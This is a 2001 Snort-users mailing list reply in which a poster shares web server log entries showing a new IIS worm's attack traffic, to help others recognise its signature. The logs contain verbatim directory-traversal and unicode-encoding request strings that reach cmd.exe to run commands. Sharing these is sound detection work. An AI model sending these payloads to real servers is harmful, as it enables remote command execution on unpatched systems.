[Snort-users] WEB-IIS Cmd attack

Erek Adams erek at ...577...
Tue Sep 18 09:10:02 EDT 2001


On Tue, 18 Sep 2001, cdowns wrote:

> What is the actual signiture as i have seen nothing yet on my servers in
> NH

Give it time, give it time....

What I'm seeing is the following:

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:24 -0700] "GET /c/winnt/system32/cmd.exe?
/c+dir HTTP/1.0" 404 297 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:24 -0700] "GET /d/winnt/system32/cmd.exe?
/c+dir HTTP/1.0" 404 297 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /scripts/..%255c../winnt
/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /_vti_bin/..%255c..
/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /_mem_bin/..%255c..
/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /msadc/..%255c../..%255c..
/..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 344 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:37 -0700] "GET /scripts/..%c1%1c../winnt
/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"

And repeats, ad nausem.

There are some others, but basically still just your standard unicode string
attack.

Damn...  This one looks worse than CR.  *sigh*

-----
Erek Adams
Nifty-Type-Guy
TheAdamsFamily.Net





More information about the Snort-users mailing list